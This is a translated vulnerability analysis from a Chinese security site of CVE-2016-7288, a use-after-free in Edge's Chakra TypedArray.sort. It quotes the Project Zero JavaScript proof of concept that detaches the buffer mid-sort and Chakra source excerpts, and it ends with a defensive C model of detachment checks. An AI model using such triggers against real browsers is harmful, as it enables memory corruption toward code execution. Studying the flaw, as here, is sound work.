MYHACK58:62201785933
Published May 08, 2017

MS16-145: Edge browser TypedArray.sort UAF vulnerability analysis (vulnerability warning, Heiba Security Net / myhack58)

2017-05-08 00:00:00
Anonymous (佚名)
www.myhack58.com

EPSS: 0.844 (High), percentile 98.5%

In this article we give the reader a detailed analysis of how a UAF vulnerability in the MS Edge browser can be turned into remote code execution.
We cover the root cause of the CVE-2016-7288 UAF vulnerability in MS Edge, how to trigger the UAF reliably, how to precisely steer Quicksort's left/right partitioning so that the swap operations corrupt memory in a controlled way, how to obtain relative memory read/write primitives from that, how WebGL is then used to convert them into absolute read/write primitives, and finally how counterfeit object-oriented programming (COOP) is used to bypass control-flow protection.
Analysis notes
The analysis in this article was performed on Windows 10 Anniversary Update x64 with the following version of MS Edge.
Vulnerable module: chakra.dll 11.0.14393.0
Description
Google Project Zero published this vulnerability together with a proof of concept [3]; it is described as a UAF in the JavaScript TypedArray.sort method.
The original PoC posted on the Project Zero bug tracker is as follows:
var buf = new ArrayBuffer(0x10010);
var numbers = new Uint8Array(buf);
var first = 0;
function v() {
    alert("in v");
    if (first == 0) {
        postMessage("test", "http://127.0.0.1", [buf]);
        first++;
    }
    return 7;
}
function compareNumbers(a, b) {
    alert("in func");
    return {valueOf : v};
}
try {
    numbers.sort(compareNumbers);
} catch (e) {
    alert(e.message);
}
It is worth noting that in my testing, this PoC simply did not trigger the vulnerability.
Root cause of the vulnerability
According to the Mozilla documentation for TypedArray.sort [4], "the sort() method sorts the elements of a typed array in place and returns the typed array". The method has an optional parameter named compareFunction, which "specifies a custom sort-order function".
The native implementation behind JavaScript's TypedArray.sort is chakra!TypedArrayBase::EntrySort, defined in lib/Runtime/Library/TypedArray.cpp.
Var TypedArrayBase::EntrySort(RecyclableObject* function, CallInfo callInfo, ...)
{
    [...]
    // Get the elements comparison function for the type of this TypedArray
    void* elementCompare = reinterpret_cast<void*>(typedArrayBase->GetCompareElementsFunction());
    // Cast the compare to the correct function type
    int(__cdecl* elementCompareFunc)(void*, const void*, const void*) = (int(__cdecl*)(void*, const void*, const void*))elementCompare;
    void* contextToPass[] = { typedArrayBase, compareFn };
    // We can always call qsort_s with the same arguments. If the user compareFn is non-null, the callback will use it to do the comparison.
    qsort_s(typedArrayBase->GetByteBuffer(), length, typedArrayBase->GetBytesPerElement(), elementCompareFunc, contextToPass);
We can see that it calls GetCompareElementsFunction to obtain the element comparison function, casts it to the right function type, and passes it to qsort_s() [5] as the fourth parameter. According to its documentation:
"The qsort_s function implements a quick-sort algorithm to sort an array of elements [...]. qsort_s overwrites this array with the sorted elements. The compare argument is a pointer to a user-supplied routine that compares two array elements and returns a value specifying their relationship. qsort_s calls the compare routine one or more times during the sort, each time passing pointers to two array elements."
The exact behaviour of qsort_s described here matters a great deal for our task; this will become clear later in the article.
GetCompareElementsFunction is defined in lib/Runtime/Library/TypedArray.h and simply returns the address of TypedArrayCompareElementsHelper:
CompareElementsFunction GetCompareElementsFunction()
{
return &TypedArrayCompareElementsHelper;
}
The native comparison function TypedArrayCompareElementsHelper is defined in TypedArray.cpp; its code is as follows:
template<typename T> int __cdecl TypedArrayCompareElementsHelper(void* context, const void* elem1, const void* elem2)
{
    [...]
    Var retVal = CALL_FUNCTION(compFn, CallInfo(CallFlags_Value, 3),
        undefined,
        JavascriptNumber::ToVarWithCheck((double)x, scriptContext),
        JavascriptNumber::ToVarWithCheck((double)y, scriptContext));
    Assert(TypedArrayBase::Is(contextArray[0]));
    if (TypedArrayBase::IsDetachedTypedArray(contextArray[0]))
    {
        JavascriptError::ThrowTypeError(scriptContext, JSERR_DetachedTypedArray, _u("[TypedArray].prototype.sort"));
    }
    if (TaggedInt::Is(retVal))
    {
        return TaggedInt::ToInt32(retVal);
    }
    if (JavascriptNumber::Is_NoTaggedIntCheck(retVal))
    {
        dblResult = JavascriptNumber::GetValue(retVal);
    }
    else
    {
        dblResult = JavascriptConversion::ToNumber_Full(retVal, scriptContext);

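The helper above re-enters script twice: once in CALL_FUNCTION, and again when the returned value is converted to a number, which is where the PoC's comparator returns an object whose valueOf transfers the buffer away. The following C program is an added example written for this article, not Chakra's code and not its fix: it models a qsort_s-style sort driven by a script comparator whose result may still need a conversion hook, and it places a detachment check after every re-entry before the buffer is touched again. Every name in it (detachable_buffer, cmp_result, sort_detachable, the two comparators, the demo functions) and the six-byte sample input are constructed for the example.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* A typed array's view of its backing store. data becomes NULL once the
 * store has been transferred away (detached); this stands in for the
 * IsDetachedTypedArray check in the real helper. (Hypothetical type.) */
typedef struct {
    uint8_t *data;
    size_t length;
} detachable_buffer;

/* What the script comparator hands back: either a plain number, or an
 * object whose value_of hook must still be called to obtain a number.
 * That hook runs script again and, as in the PoC, may detach the buffer. */
typedef struct {
    int is_number;
    int number;
    int (*value_of)(detachable_buffer *buf);
} cmp_result;

typedef cmp_result (*script_compare)(detachable_buffer *buf, uint8_t a, uint8_t b);

/* Transfer the store away: the memory is freed and the view is detached. */
static void detach(detachable_buffer *buf) {
    free(buf->data);
    buf->data = NULL;
    buf->length = 0;
}

/* Insertion sort driven by a script comparator. Each re-entry into script
 * is followed by a detachment check before the buffer is read or written
 * again. Returns 0 on success, -1 if the buffer was detached mid-sort (the
 * model's equivalent of throwing JSERR_DetachedTypedArray). */
static int sort_detachable(detachable_buffer *buf, script_compare cmp) {
    for (size_t i = 1; i < buf->length; i++) {
        for (size_t j = i; j > 0; j--) {
            uint8_t a = buf->data[j - 1], b = buf->data[j]; /* read before re-entering script */
            cmp_result r = cmp(buf, a, b);
            if (buf->data == NULL) return -1;   /* check 1: after the comparator call */
            int order = r.is_number ? r.number : r.value_of(buf);
            if (buf->data == NULL) return -1;   /* check 2: after the conversion hook */
            if (order <= 0) break;
            buf->data[j - 1] = b;               /* write back only once both checks passed */
            buf->data[j] = a;
        }
    }
    return 0;
}

/* A well-behaved comparator: returns a plain number, no second re-entry. */
static cmp_result plain_compare(detachable_buffer *buf, uint8_t a, uint8_t b) {
    (void)buf;
    cmp_result r = {1, (int)a - (int)b, NULL};
    return r;
}

/* Conversion hook that detaches the buffer, like the PoC's valueOf
 * calling postMessage(..., [buf]) before returning 7. */
static int value_of_detaches(detachable_buffer *buf) {
    detach(buf);
    return 7;
}

/* Comparator that returns an object needing conversion, like the PoC. */
static cmp_result detaching_compare(detachable_buffer *buf, uint8_t a, uint8_t b) {
    (void)buf; (void)a; (void)b;
    cmp_result r = {0, 0, value_of_detaches};
    return r;
}

/* Constructed sample input for the demos. */
static detachable_buffer make_buffer(void) {
    static const uint8_t sample[] = {5, 3, 9, 1, 7, 2};
    detachable_buffer b;
    b.length = sizeof sample;
    b.data = malloc(b.length);
    memcpy(b.data, sample, b.length);
    return b;
}

/* Returns 1 if the plain comparator leaves the sample sorted ascending. */
int demo_plain_sort(void) {
    detachable_buffer b = make_buffer();
    int ok = sort_detachable(&b, plain_compare) == 0;
    for (size_t i = 1; ok && i < b.length; i++) ok = b.data[i - 1] <= b.data[i];
    free(b.data);
    return ok;
}

/* Returns the sort's status when the conversion hook detaches the buffer:
 * -1, and no freed memory is touched afterwards. */
int demo_detaching_sort(void) {
    detachable_buffer b = make_buffer();
    int rc = sort_detachable(&b, detaching_compare);
    free(b.data);   /* NULL after detach; free(NULL) is a no-op */
    return rc;
}

int main(void) {
    printf("plain sort ok: %d\n", demo_plain_sort());
    printf("detaching sort status: %d\n", demo_detaching_sort());
    return 0;
}
```

The point of the model is the position of the checks: the values handed to the comparator are read before any script runs, and the buffer is only read or written again after the last re-entrant call has returned and the detachment flag has been re-inspected. A single check placed between the comparator call and the conversion covers the first re-entry but not the second.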